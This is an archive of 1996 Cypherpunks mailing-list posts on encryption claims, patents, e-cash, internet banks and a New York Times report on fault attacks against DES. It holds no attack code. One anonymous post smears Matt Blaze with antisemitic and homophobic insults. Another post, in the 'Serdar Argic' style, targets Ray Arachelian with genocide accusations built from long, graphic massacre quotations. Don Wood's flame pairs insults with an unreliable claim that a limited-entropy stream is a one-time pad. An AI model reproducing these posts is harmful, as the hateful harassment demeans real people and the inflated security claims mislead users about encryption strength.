> If the entropy is limited, you do not have a One Time Pad, period, end
> of discussion, its over.
> 
I am sorry God! I did not understand that was one of PETTY MESSger's
Commandments. You say that Shannon, or you, or someone can prove that
mathematically, so let's see someone do it. 156.8816 megabytes of raw
encryptor stream output should be enough to work with - if you need more,
I can provide same.   I agree  that theoretically it can be broken by
brute force but that is patently impossible as you can quickly discern if
you examine the algorithm and try it, instead of salivating your
mouth off with baseless blabber. Obviously, my algorithm does not produce
a pure random stream. I agree with Shannon that it is not "perfect,"
but it most certainly is perfect enough to meet any and all practical
requirements, now and forever. 

> >          It meets each and every criteria rationally established for an
> >          OTP in all reasonable aspects.
> 
> Set by WHOM? By you? Your criteria bear no resemblance to those
> accepted in general. Are you one of those people who sells someone a
> loaf of bread and says "this is an automobile, by every criterion I
> have set for automobiles"?
> 
There you go again, strutting about and spreading your pretentious turkey
droppings, manure,  all over the place. 

As you know, I headed the OTP group at NSA, and while there I conceived and
implemented, under the direction of Abraham Sinkov, Dottie Bloome, Leon
O'mera and William J. Cherry, LONE STAR, the Library of ONe time pad
Encryption Statistical Analysis Routines. I was responsible for the
generation and computer analysis of OTPs at NSA. I have worked on
thousands of OTPs, both in the generation of, and comprehensive analysis
of same, including looking for repetitive usage of the same OTP, including
direct as well as nth degree derivatives, over the last 40 years, at NSA
and at Mauchly-Wood. I make no claim that I am the world's greatest OTP
authority, or even an authority on them like you obviously THINK you are,
but I think that I have more than a little knowledge about the subject of
OTPs.

That brings up something that utterly fascinates me. Which is your
frequent oblique writings about VERONA, or is it VENONA, or maybe it is
VERONICA, or maybe even VERONIKA - anyway you know what I mean. Would you
be so kind as to enlighten me, us, about that subject - I would like to
finally find out what really happened from an authoritative source. How
were we able to break some of those messages. Please help me, us, out with
details instead of blabber. 

For those who have not seen my resume', it together with dozens and
dozens of references, many of whom are well known, and some of whom you
may know, is posted on our web site, but obviously that does not prove
anything, except to provide a point of reference. 

The point is that we have disclosed the complete algorithm, for the first
time at the web site, so let's see someone provide us with the key or the
ABCs. Our server is downloading an enormous number of the
algorithms/data/statistical tests, over 1,000 so far, so we assume
someone is testing it and evaluating it. 

And for you to claim that my contention is analogous to comparing bread
to an automobile, clearly demonstrates how PETTY of a MESSinger, you
are. You cannot do anything, so you babble in mindless hyperbole. 

> >          Think about that simple supposition for a moment. What do we
> >          mean by an OTP?
> 
> Something different from what everyone else means, so it makes no
> difference. 

Obviously something different from what YOU, and most others,
mistakenly think it means. It is not some esoteric, theoretical
mathematical meaning that has no relation to our real world. It is a tool
to encrypt and decrypt messages with, it is not a mathematical formula. If
you say that a random number sequence is not generated, I agree. If
however, you go on and add that, "thus by definition it is not an OTP,"
then that is patently and absolutely a false statement, though subscribed
to by most of the cryptography community. You are a mix-master
stirring up cryptography and IT, and you simply cannot homogenize
them into a fully blended mix.  

I assert that an OTP is a tool used for encryption which by definition,
can never be used again, and which consists of a sequence of bits which
can not be derived by any POSSIBLE, not theoretical but POSSIBLE, means.
Granted, our stream could theoretically be derived by trying all of the
possible 10^34322 keys/table values, but that is theory, it is absolutely
clear that there is no way to try all the possibilities, or even the first
800 bits of an encryptor stream. Any relatively informed mathematician
can quickly discern that there is no analytical attack that can be made
against the stream, it is that simple,  as readers/evaluators will find.

If the only method of cracking the system is by brute force, and that is
impossible, then it is absolutely an OTP for encryption and decryption
purposes, which is its purpose - it is not something to define in IT
writings. Our algorithm is absolutely not perfect in the theoretical
sense but it is PERFECT as far as the ability to determine the underlying
plain text is concern.

> 
> >          Not only that, but you can prove it to yourself, Q.E.D.  We
> >          maintain that it is discernible to any knowledgeable person
> >          who probes the algorithm, that the only analytical tack that
> >          can be mounted against EUREKA is brute force and that is
> >          patently impossible.. One of your Cpunk colleagues says he
> >          uses Triple DES, 168 bits, and he does not believe that it
> >          can be brute forced - I agree, 3-DES, 10^50+ possibilities,
> >          cannot be brute forced now, or in the foreseeable future -
> >          then what about the EUREKA's 10^34322 possibilities,
> >          10^34271+ greater than 3-DES? No way, not now, not ever.
> >          Furthermore, EUREKA is an order, or more, magnitude faster
> >          than triple DES, easier to use, much more secure, etal.
> 
> I believe that we have already established that your cipher is easy to
> crack, so your claims that it is hard to crack really don't matter.
> 
> Perry
> 
Don't yopu wish PETTY MESSger. Did your mother put lambs blood on your
door when brains were passed out? Obviously, you are a victim of severe
brain passover. To think that I would post the same partial algorithm that
I heretofore posted is so crass as not to deserve comment. 

It does however, define your abstruse, enigmatic thinking that somehow  
facts can be ignored, that you can use smoke, mirrors, semantics and
words to block out the truth. 

To repeat, we have made some a changes, and for the first time disclosed, 
detailed, the FULL ALGORITHM  at great length at our web site. The reason
that you do not want to argue that is obviously because you are absolutely
impotent in that regard and you are unable to dispute facts, so you
blindly conjure up some witches brew of words and think that people will
never know the difference. To paraphrase John Dean, the truth will always
come out and your ass braying will never stop that truth. 
 
Don Wood, 


  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hayashi_Tsuyoshi <take@barrier-free.co.jp>
Date: Fri, 18 Oct 1996 06:18:54 -0700 (PDT)
To: Robert Hettinga <jimbell@pacifier.com>
Subject: Re: EC patent
Message-ID: <199610181317.WAA07401@ns.barrier-free.co.jp>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 17 Oct 1996 17:38:28 -0800, jim bell said:
 >At 04:53 PM 10/17/96 -0400, Robert Hettinga wrote:
 >>--- begin forwarded text
 >>Date: Thu, 17 Oct 1996 14:03:34 +0800
 >>From: James Lee <jlee@ccl.itri.org.tw>
 >>Reply-To: jlee@ccl.itri.org.tw
 >>+----------------------------------------------------+
 >>Addressed to: set-discuss@commerce.net
 >>+----------------------------------------------------+
 >>
 >>I heard that CitiBank has filed for a patent in Japan with 140+ claims

The document is on my desk:

  CitiBank's patent in Japan #: Toku-Kou-Hei 7-111723
    o 104 claims
    o published date: 29 Nov, 1995
    o 112 pages (text: 48 pages, fig.: 64 pages.)

# Note:
# "Toku" means "Tokkyo", "tokkyo" == "patent"
# "Kou" means "Koukoku", "koukoku" == "published"
# "Hei" means "Heisei", "Heisei" is the Japanese year-
#   name; This year == Heisei 8 == 1996.

A publication of the CitiBank's patent was a big news in
industrial or financial domain in Japan.  I found the
article on Nikkei-Sangyo shinbun.

# sangyo == industrial
# shinbun == paper

 >>covering many aspects of electronic commerce, security electronic
 >>transaction, etc.

Probably yes.

 >>--- end forwarded text
 >
 >Maybe Japanese law is different, but don't I recall reading somewhere that 
 >"methods of doing business," business practices in general, are not 
 >patentable? 

It seems that "Toku-Kou-Hei 7-111723" claims specified
procedure, not *general* "methods of doing business".

 >Not that it would surprise me if the Patent Office idiots were to change 
 >their minds, like they did concerning software, algorithms, and mathematics 
 >in general...

I think that Japanese P.O. has changed their policy in a
few years influenced with U.S.P.O.

///hayashi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Fri, 18 Oct 1996 13:35:47 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: POTP critques?
In-Reply-To: <199610181356.GAA10935@toad.com>
Message-ID: <199610182035.WAA01710@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Peter Trei <trei@process.com> wrote:

> An acquaintence of mine works at a firm with little cryptography
> experience. They are thinking of including cryptography in a 
> future product, and Elementrix's Power One Time Pad is a
> serious contestant.
> 
> I'm looking for independent critiques of the system, something
> better than 'it's not really a one-time pad.' Is the cryptosystem
> which is actually implemented worth a damn? Does their claim
> to have solved the key distribution problem hold water? I
> seem to remember something about them wanting to
> generate keys for you, and ship them to the customer. Is this
> correct?

Not quite.  What the program actually does is the first time you send a
message, it generates an initial key and sends the key - in plaintext -
to the recipient.  Then the first message is encrypted with this key.
So the system initially has absolutely no security at all.  

The second message sent is encrypted with a hash of the first message as
a key.  The third message is encrypted using a hash of the second message,
and so forth.  So each time you send a new message, you in effect send
a new key, encrypted with the old key.  Their theory is that if the
eavesdropper misses a message, then he loses the key, and can't decrypt
the messages anymore.

Of course, if the intended recipient loses a message then he loses the key
for subsequent messages too.  Thus we have a nice little denial-of-service
attack.  They prevent this via a "emeregency resynchronization" procedure
(which they seem quite proud of, and their web pages congratulate
themselves repeatedy on the purported cleverness of this).  Of course, this
"resnchronization" is based upon a pre-arranged key, which the eavesdropper
should already have, if he's been decrypting their mail.  Even better,
the attacker can synchronize with one or both parties, performing a
man-in-the-middle attack and/or spoofing them.

So basically the system will stand up to a passive sniffing attack only if
the eavesdropper is clumsy and loses messages, and doesn't stand up to a 
denial-of-service or man-in-the-middle attack at all.  And I haven't even
considered implementation bugs yet.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Nicolas J. Hammond" <njhm@ns.njh.com>
Date: Sat, 19 Oct 1996 10:37:53 -0700 (PDT)
To: ponder@freenet.tlh.fl.us (P. J. Ponder)
Subject: Re: news item on Atlanta bank
In-Reply-To: <Pine.OSF.3.91.961018153037.5149A-100000@fn3.freenet.tlh.fl.us>
Message-ID: <199610190239.WAA21486@ns.njh.com>
MIME-Version: 1.0
Content-Type: text/plain


P. J. Ponder wrote ...
>   from:
>   [http://netday.iworld.com/news1.shtml]
> 
>   news@iworld.com
>   
>   "CyberBank" Opens for Business
>   
>   [October 18] -- Atlanta Internet Bank reports its
>   cyberdoors are open for business as the world's first
>   Internet-only bank.

Security First Network Bank officially opened just over one year ago
(they had their one year anniversary this past Thursday).
SFNB actually had been on-line about 4 months before that
(I helped with their security when I was with a different company).
SFNB was the first Internet-only bank.

SFNB is planning on opening some bricks + mortar branches which
means that, technically, AIB's press release may be correct
(only "Internet-only" bank), but it will be a couple of months 
before AIB is actually on the Internet. According to local 
newspapers AIB is only available through AT&T's
network - it will be a couple of months before they are on the Internet.

>   Currently available to AT&T WorldNet Service
>   subscribers, Atlanta Internet Bank's initial products
>   include interest-bearing checking accounts, direct
>   deposit, electronic bill payment, account transfer
>   capability, and ATM cards.
>   [...]


-- 
Nicolas Hammond                                 NJH Security Consulting, Inc.
njhm@njh.com                                    211 East Wesley Road
404 262 1633                                    Atlanta
404 812 1984 (Fax)                              GA 30305-3774




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@zifi.genetics.utah.edu (Anonymous)
Date: Sat, 19 Oct 1996 10:36:36 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [PGP] Re: FYI - Biham/Shamir Differential Fault Analysis of DES, etc.
Message-ID: <199610190449.WAA06334@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


In .cypherpunks, Matt Blaze <mab@research.att.com> writes:
                                 ^^^^^^^^^^^^^^^^ <--- AT&T/NSA HQ
>Subject: A new attack on DES
>
>
>Research announcement: A new cryptanalytic attack on DES
>
>

As usual, Blaze/AT&T uses cypherpunks to spread FUD from it's NSA masters.
This time, however, he's stolen the work of others and twisted it to suit
the corporate goals. Bet his next message is a commercial from AT&T for the
clipper chip, which, they will ass-u-re us, fixes this socalled <<attack>>.
Someone should sue Blaze and AT&T.

Blaze, who is a wellknown homosexual Jew, probably can expect a nice bonus
in next weeks blood money check for thinking of this latest little stunt,
so I'm sure he can afford the legal fees. Just a cost of doing biz, right?

Shame on him!

p.S. I know this post sounds angry but this kind of shit just pisses me off
so much.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 19 Oct 1996 10:36:22 -0700 (PDT)
To: cypherpunks@toad.com
Subject: looking for old cpunk material
Message-ID: <199610190619.XAA12009@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



hi, does anyone have that old cypherpunk enquirer that was
a brilliant satire using the Carroll Alice in Wonderland framework?

also, I wonder if anyone has a digitized image of the 
cpunk founders Hughes, TCM, Gilmore pictured in that old NYT article.
(or alternately the same from that old issue of wired)

please send either if you have them..

thanks;




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremiah A Blatz <jer+@andrew.cmu.edu>
Date: Sat, 19 Oct 1996 10:37:47 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: PIS_son
In-Reply-To: <1.5.4.32.19961018165938.006d39ec@pop.pipeline.com>
Message-ID: <0mO4nn200YUg0T98o0@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


John Young <jya@pipeline.com> writes:
>    PhIn: "Unsuspecting Internet Users' 'Cookie' Files Concern
>    Privacy Advocates"
> 
>       But look at cookie users another way: You're the hydrant 
>       and they're the dogs, marking you for future reference.

For the Mac people, CookieCleaner (available at your local info-mac
mirror) will trim unwanted entires from your cookie file (source
included).

Jer

ObCrypto: Has anyone at CMU/Pitt/anywhere that uses AMS gotten
MailCrypt to work with BatMail?

"standing on top of the world/ never knew how you never could/ never knew
 why you never could live/ innocent life that everyone did" -Wormhole




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peng-chiew low <pclow@pc.jaring.my>
Date: Fri, 18 Oct 1996 09:31:50 -0700 (PDT)
To: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Subject: RSA 1024bit Key for Export
In-Reply-To: <Pine.SUN.3.95.961017114912.26607H-100000@viper.law.miami.edu>
Message-ID: <3267BDD2.DB9@pc.jaring.my>
MIME-Version: 1.0
Content-Type: text/plain


Just a short question :

What is the exportable maximum key length of RSA if
use for encrypting session keys? My local Cylink VAR
in Malaysia says it is 1024bit for encrypting the
Omega algo.

Comments and advice appreciated.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 19 Oct 1996 10:33:40 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Judge rules "harmless flame" is harassment
Message-ID: <v0300783dae8e1c8ee2d2@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Date: Fri, 18 Oct 1996 20:42:26 -0400
From: oldbear@arctos.com (The Old Bear) (by way of rah@shipwright.com
(Robert A. Hettinga))
To: rah@shipwright.com
Subject: Judge rules "harmless flame" is harassment
Organization: The Arctos Group - http://www.arctos.com/arctos
Mime-Version: 1.0
Path: news-central.tiac.net!news-in.tiac.net!posterchild!arctos.com!oldbear
Newsgroups: tiac
Lines: 23
NNTP-Posting-Host: arctos.com
X-Newsreader: Trumpet for Windows [Version 1.0 Rev B final beta #4]
X-Newsreader: Yet Another NewsWatcher 2.3.0
Status: RO

hmmm.... there is something strangely familiar about
the premise behind this story, but I can't seem to
figure out what it might be...


  JUDGE ORDERS DALLAS MAN TO CEASE HARASSMENT ON NET

  A district judge in Texas has issued a restraining order
  against a Dallas man who was using the Internet to post
  sexually derogatory remarks about the wife of a couple who
  operate an Internet Service Provider.

  The man said he had developed "a bad taste in (his) mouth"
  after trying unsuccessfully to reach the company to price
  its services;  however, he now "wholeheartedly, 100 percent"
  denies that his messages were threatening and insists that
  they merely adopted the sarcastic language typically found
  on the Internet.

  source: Atlanta Journal-Constitution
          October 17, 1996

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: amnesia@chardos.connix.com (Anonymous)
Date: Sat, 19 Oct 1996 10:38:01 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [DES] Digital signatures
Message-ID: <199610190618.CAA19162@chardos.connix.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim C[rook] May steals condiments from fast food restaurants.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 19 Oct 1996 10:34:45 -0700 (PDT)
To: cypherpunks@toad.com
Subject: NYT on DFA
Message-ID: <1.5.4.32.19961019113041.006abd10@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Times, October 19, 1996, p. 37.


   2 Israelis Outline New Risk To Electronic Data Security

      Hints That 'Smart Cards' Aren't So Smart

   By John Markoff


   San Francisco, Oct. 18 -- Two of Israel's leading computer
   scientists say they have found a way to more easily decode
   and then counterfeit the electronic cash "smart cards" that
   are now widely used in Europe and are being tested in the
   United States.

   The researchers have begun circulating the draft of a paper
   that points out higher security risks than those discovered
   last month by scientists at Bell Communications Research.

   The Bell communications researchers had reported that it
   might be possible to counterfeit many types of the "smart
   cards" that are being tested by banks and credit card
   companies, including Visa and Mastercard.

   The two Israeli scientists, Adi Shamir, a professor at the
   applied mathematics department at the Weizmann Institute,
   and Eli Biham, a member of the faculty of the computer
   science department at the Technion, reported that in
   addition to the so-called public key coding systems that
   were found vulnerable by the Bellcore team, private key
   data coding systems such as the American Data Encryption
   Standard, or DES, can be successfully attacked if a
   computer processor can be made to produce an error.

   The two Israeli's made a draft of their research available
   via the Internet on Thursday. In their paper the two wrote,
   "We can extract the full DES key from a sealed tamperproof
   DES encryptor" by analyzing fewer than 200 encoded
   messages.

   Both public key and private key data scrambling methods are
   based on the difficulty involved in factoring large
   numbers. A public key system permits two parties who have
   never met to exchange secret information. A private key
   system requires that a secret key be exchanged beforehand.

   Data coding experts said that the new Israeli method might
   be a more practical system than the previously announced
   Bellcore method, because unlike public keys, which are
   frequently used only once per message, a private secret key
   may be used repeatedly to scramble electronic transactions.

   "This seems a lot closer to something that might actually
   be used," said Matt Blaze, a computer researcher at AT&T
   Laboratories.

   Smart cards have been promoted as tamper proof, which is
   why computer scientists at Bellcore, one of the nation's
   leading information-technology laboratories, sounded the
   alarm last month, saying that a savvy criminal might be
   able to tweak a smart-card chip to make a counterfeit copy
   of the monetary value on a legitimate card.

   Executives at smart card companies said at the time that
   the attack was theoretical and that it would be impossible
   to make a smart card generate an error without actually
   destroying the card.

   However, Mr. Biham responded that he believed such hardware
   attacks were possible. The cards are generally damaged
   using heat or radiation, which causes the computer chip in
   the card to generate an error, which the Israeli scientists
   used to obtain the code key and copy the card.

   "I have ample evidence that hardware faults can be
   generated without too much difficulty," he said in an
   electronic mail message. "As a consultant to some high-tech
   companies, I had numerous opportunities to witness
   successful attacks by commercial pirates on pay-TV systems
   based on smart cards. I know for a fact that some of these
   attacks were based on intentional clock and power supply
   glitches, which can often cause the execution of incorrect
   instructions by the smart card."

   Other researchers said that the class of attacks
   demonstrated by the Bellcore team and the Israelis had been
   known by some members of the tightly knit community of
   cryptographers for several years, but the results had not
   been published.

   "Some of the smart card manufacturers are well aware of
   this flaw," said Paul Kocher, an independent Silicon Valley
   data security consultant. "But it doesn't mean that they
   have fixed it."

   [End]









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 19 Oct 1996 10:34:38 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: [SERDAR ARGIC] Ray Arachelian's role in the genocide of 2,500,000 moslems
In-Reply-To: <Pine.SUN.3.91.961017114528.23042B-100000@beast.brainlink.com>
Message-ID: <HDq2VD6w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Ray Arachelian <sunder@brainlink.com> writes:

> Vulis, grow up.
>
> =============================================================================
>  + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
>   \|/  |sunder@brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
> <--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
>   /|\  | "A toast to Odin,  |KA| law abridging the freedom of speech'|==\|/==
>  + v + |God of screwdrivers"|AK|        do you not understand?       |=======
> ===================http://www.brainlink.COM/~sunder/=========================
>       If the Macintosh is a woman...  Then Windows is a Transvestite!
>            ActiveX! ActiveX! Format Hard drive? Just say yes!

My friend and colleague, Dr. Serdar Argic, has cited the following sources
in reference to Ray Arachelian's criminal dandruff-covered grandparents:

_The Jewish Times_ June 21, 1990

_An appropriate analogy with the Jewish Holocaust might be the
 systematic extermination of the entire Muslim population of
 the independent republic of Armenia which consisted of at
 least 30-40 percent of the population of that republic. The
 memoirs of an Armenian army officer who participated in and
 eye-witnessed these atrocities was published in the U.S. in
 1926 with the title 'Men Are Like That.' Other references abound._


A. Lalayan, _Revolutsionniy Vostok (Revolutionary East)_
             No: 2-3, Moscow, 1936.
            -One of the architects of the Armenian genocide
             of 2.5 million Muslim people_


 _I killed Muslims by every means possible. Yet it is
  sometimes a pity to waste bullets for this. The best
  way is to gather all of these dogs and throw them into
  wells and then fill the wells with big and heavy stones,
  as I did. I gathered all of the women, men and children,
  threw big stones down on top of them. They must never live
  on this earth._


 Leonard Ramsden Hartill, _Men Are Like That_ The Bobbs-Merrill
                           Company, Indianapolis (1926).
_Memoirs of an Armenian officer who participated in the Armenian
 genocide of 2.5 million Muslim people_


_Foreword:_

_For example, we were camped one night in a half-ruined Tartar
 mosque, the most habitable building of a destroyed village, near
 the border of Persia and Russian Armenia. During the course of
 evening I asked Ohanus if he could tell me anything of the history
 of the village and the cause of its destruction. In his matter of
 fact way he replied, Yes, I assisted in its sack and destruction,
 and witnessed the slaying of those whose bones you saw to-day
 scattered among its ruins._

p. 218 (first and second paragraphs)

_We Armenians did not spare the Muslims. If persisted in, the
 slaughtering of Tartars, the looting, and the rape and massacre
 of the helpless become commonplace actions expected and accepted
 as a matter of course.

 I have been on the scenes of massacres where the dead lay on the
 ground, in numbers, like the fallen leaves in a forest. Muslims
 had been as helpless and as defenseless as sheep. They had not died
 as soldiers die in the heat of battle, fired with ardor and courage,
 with weapons in their hands, and exchanging blow for blow. They had
 died as the helpless must, with their hearts and brains bursting
 with horror worse than death itself._


 Leonard Ramsden Hartill, _Men Are Like That_ The Bobbs-Merrill
                           Company, Indianapolis (1926).
_Memoirs of an Armenian officer who participated in the Armenian
 genocide of 2.5 million Muslim people_


p. 15 (second paragraph)

_The Tartars [Muslims] were, for the most part, poor. Some of them
 lived in villages and cultivated small farms; many of them continued
 in the way of life of their nomadic forefathers. They drove their
 flocks and herds from valley to valley, from plain to mountain, and
 from mountain to plain, following the pasturage as it changed with
 the seasons. They ranged from the salt desert shores of the Caspian
 Sea far into the mighty Caucasus Mountains. Even the village Tartars
 are a primitive people, only semicivilized.

 I can see now that we Armenians frankly despised the Tartars, and,
 while holding a disproportionate share of the wealth of the country,
 regarded and treated them as inferiors._


p. 20 (second paragraph)

_Our men armed themselves, gathered together and advanced on the
 Tartar section of the village. There were no lights in the houses
 and the doors were barred, for the Tartars suspected what as to
 happen and were in great fear. Our men hammered on the doors, but
 got no response; whereupon they smashed in the doors and began a
 carnage that continued until the last Tartar was slain. Throughout
 the hideous night, I cowered at home in terror, unable to shut my
 ears to the piercing screams of the helpless victims and the loud
 shouts of our men. By morning the work was finished._


 Leonard Ramsden Hartill, _Men Are Like That_ The Bobbs-Merrill
                           Company, Indianapolis (1926).
_Memoirs of an Armenian officer who participated in the Armenian
 genocide of 2.5 million Muslim people_


p. 109 (second paragraph).

_The method of execution was for an Armenian government 'mauserist'
 to walk up behind the condemned Muslim in his home or on the street,
 place a pistol to the back of his head and blow out his brains.
 This simple way of getting rid of those who were undesirable in
 the view of the Armenian government and soon became a common way
 of paying debts._


p. 202 (first and second paragraphs)

_We closed the roads and mountain passes that might serve as
 ways of escape for the Tartars and then proceeded in the work
 of extermination. Our troops surrounded village after village.
 Little resistance was offered. Our artillery knocked the huts
 into heaps of stone and dust and when the villages became untenable
 and inhabitants fled from them into fields, bullets and bayonets
 completed the work. Some of the Tartars escaped of course. They
 found refuge in the mountains or succeeded in crossing the border
 into Turkey. The rest were killed. And so it is that the whole
 length of the borderland of Russian Armenia from Nakhitchevan to
 Akhalkalaki from the hot plains of Ararat to the cold mountain
 plateau of the North were dotted with mute mournful ruins of
 Tartar villages. They are quiet now, those villages, except for
 howling of wolves and jackals that visit them to paw over the
 scattered bones of the dead._


 Leonard Ramsden Hartill, _Men Are Like That_ The Bobbs-Merrill
                           Company, Indianapolis.
_Memoirs of an Armenian officer who participated in the Armenian
 genocide of 2.5 million Muslim people_

p. 203 (second paragraph)

_One evening I passed through what had been a Tartar village. Among
 the ruins a fire was burning. I went to the fire and saw seated about
 it a group of soldiers. Among them were two Tartar girls, mere children.
 The girls were crouched on the ground, crying softly with suppressed
 sobs. Lying scattered over the ground were broken household utensils
 and other furnishings of Tartar peasant homes. There were also bodies
 of the Muslim dead._

p. 204 (first paragraph)

_I was soon asleep. In the night I was awakened by the persistent crying
 of a child. I arose and went to investigate. A full moon enabled me to
 make my way about and revealed to me all the wreck and litter of the
 tragedy that had been enacted. Guided by the child's crying, I entered
 the yard of a house, which I judged from its appearance must have been
 the home of a Muslim family. There in a corner of the yard I found a
 women dead. Her throat had been cut. Lying on her breast was a small
 child, a girl about a year old._


_San Francisco Chronicle_ (December 11, 1983)

_We have first hand information and evidence of Armenian
 atrocities against our people (Jews). Members of our family
 witnessed the murder of 148 members of our family near Erzurum,
 Turkey, by Armenian neighbors, bent on destroying anything and
 anybody remotely Jewish and/or Muslim...Armenians were in league
 with Hitler in the last war, on his premise to grant themselves
 government if, in return, the Armenians would help exterminate
 Jews. Armenians were also hearty proponents of the anti-Semitic
 acts in league with the Russian Communists._

Signed Elihu Ben Levi, Vacaville, California.


"U.S. Library of Congress" _Bristol Papers_ - General
                            Correspondence Container #34.

 _While the Dashnaks [x-Russian Armenian Government] were in
  power they did everything in the world to keep the pot boiling
  by attacking Kurds, Turks and Tartars; by committing outrages
  against the Moslems; by massacring the Moslems; and robbing and
  destroying their homes. During the last two years the Armenians
  in Russian Caucasus have shown no ability to govern themselves
  and especially no ability to govern or handle other races under
  their power._


_Bristol Papers_, General Correspondence: Container #32: Bristol
                  to Bradley Letter of September 14, 1920.

_I have it from absolute first-hand information that the
 Armenians in the Caucasus attacked Tartar (Muslim) villages
 that are utterly defenseless and bombarded these villages
 with artillery and they murder the inhabitants, pillage the
 village and often burn the village._


F. Kazemzadeh, _The Struggle for Transcaucasia_ (New York, 1951),
               p. 69.

_This three-day massacre by Armenians is recorded in history as
 the 'March Events' and thousands of Muslims, old people, women
 and children lost their lives._


W. E. D. Allen and Paul Muratoff, _Caucasian Battlefields_ Cambridge
                                  University Press, 1953, p. 481.

_As the Armenians found support among the Reds (who regarded the
 Tartars as a counter-revolutionary elements) the fighting soon
 became a massacre of the Tartar population._


G. Bronsart, _Deutsche Allgemeine Zeitung_ July 24, 1921

_Since all the Moslems capable of bearing arms were in the
 Muslim Army, it was easy to organize a terrible massacre by
 the Armenians against defenseless people, because the Armenians
 were not only attacking the sides and rear of the Eastern Army
 paralyzed at the front by the Russians, but were attacking the
 Moslem folk in the region as well._


John Dewey, _The Turkish Tragedy_ The New Republic, Volume 40,
             November 12, 1928, pp. 268-269.

_Armenians boasted of having raised an army of one hundred and
 fifty thousand men to fight a civil war, and that they burned
 at least a hundred Muslim villages and exterminated their
 population._


G. Hamelin, _Les Armees Francaises au Levant_ February 2, 1919,
             Vol. 1, p. 122.

_Armenians burned and destroyed many Muslim villages in their
 advance and practically all Muslim villages in their retreat
 from Marash._


Prof F. Hertas, _Van Muslim Holocaust Museum: Muslim and Western
                 Documents on the Genocide Committed by the Armenians
                 Against the Muslims_ 1984.

p. 121.

_In his speech given at the Sivas Congress, Mustafa Kemal once again
 drew a picture of the country under occupation:

 In the East, the Armenians are making preparations for advancing to
 the River Halys (Kizilirmak), and have already started a policy of
 massacring the Moslem population._

p. 122.

_The situation of the southern provinces of Turkey after the signing
 of the Mudros Armistice is described by Ataturk in his speech:

 The Armenians in the south, armed by foreign troops and encouraged
 by the protection they enjoyed, molested the Mohammedans of their
 district. They pursued a relentless policy of murder and extinction
 everywhere. The Armenians had completely destroyed an old Mohammedan
 town like Maras by their artillery and machine-gun fire.

 They killed thousands of innocent and defenceless Muslim women and
 children. The Armenians were the instigators of the atrocities, which
 were unique in history.

 Threatened by the bayonets of the Armenians, who were armed to the teeth,
 the Mohammedans in the Vilayet of Adana were at that time in danger of
 being annihilated. While this policy of oppression and annihilation was
 carried on against the Mohammedans by the Armenians..._


Basar, H. K. (ed.); _Muslim and Russian Documents on the Genocide
                     Committed by the Armenians Against the Muslims_
                     1981.

p. 22.

_The atrocities and massacres which have been committed for a long time
 against the Muslim population within the Armenian Republic have been
 confirmed with very accurate information, and the observations made by
 Rawlinson, the British representative in Erzurum, have confirmed that
 these atrocities are being committed by the Armenians. The United States
 delegation of General Harbord has seen the thousands of refugees who came
 to take refuge with Kazim Karabekir's soldiers, hungry and miserable,
 their children and wives, their properties destroyed, and the delegation
 was a witness to the cruelties. Many Muslim villages have been destroyed
 by the soldiers of Armenian troops armed with cannons and machine guns
 before the eyes of Karabekir's troops and the people. When it was hoped
 that this operation would end, unfortunately since the beginning of
 February the cruelties inflicted on the Muslim population of the region
 of Shuraghel, Akpazar, Zarshad, and Childir have increased. According
 to documented information, 28 Muslim villages have been destroyed in the
 aforementioned region, more than 60,000 people have been slaughtered,
 many possessions and livestock have been seized, young Muslim women
 have been taken to Kars and Gumru, thousands of women and children who
 were able to flee their villages were beaten, raped and massacred in the
 mountains, and this aggression against the properties, lives, chastity
 and honour of the Muslims continued. It was the responsibility of the
 Armenian Government that the cruelties and massacres be stopped in order
 to alleviate the tensions of Muslim public opinion due to the atrocities
 committed by the Armenians, that the possessions taken from the Muslims
 be returned and that indemnities be paid, that the properties, lives,
 and honour of the Muslims be protected._


Avetis Aharonian, _From Sardarapat to Sevres and Lausanne_
                   Armenian Review, Vol. 16, No. 3-63, Autumn,
                   Sep. 1963, pp. 47-57.


p. 52 (second paragraph).

_Your three Armenian chiefs, Dro, Hamazasp and Kulkhandanian are
 the ringleaders of the bands which have destroyed Muslim villages
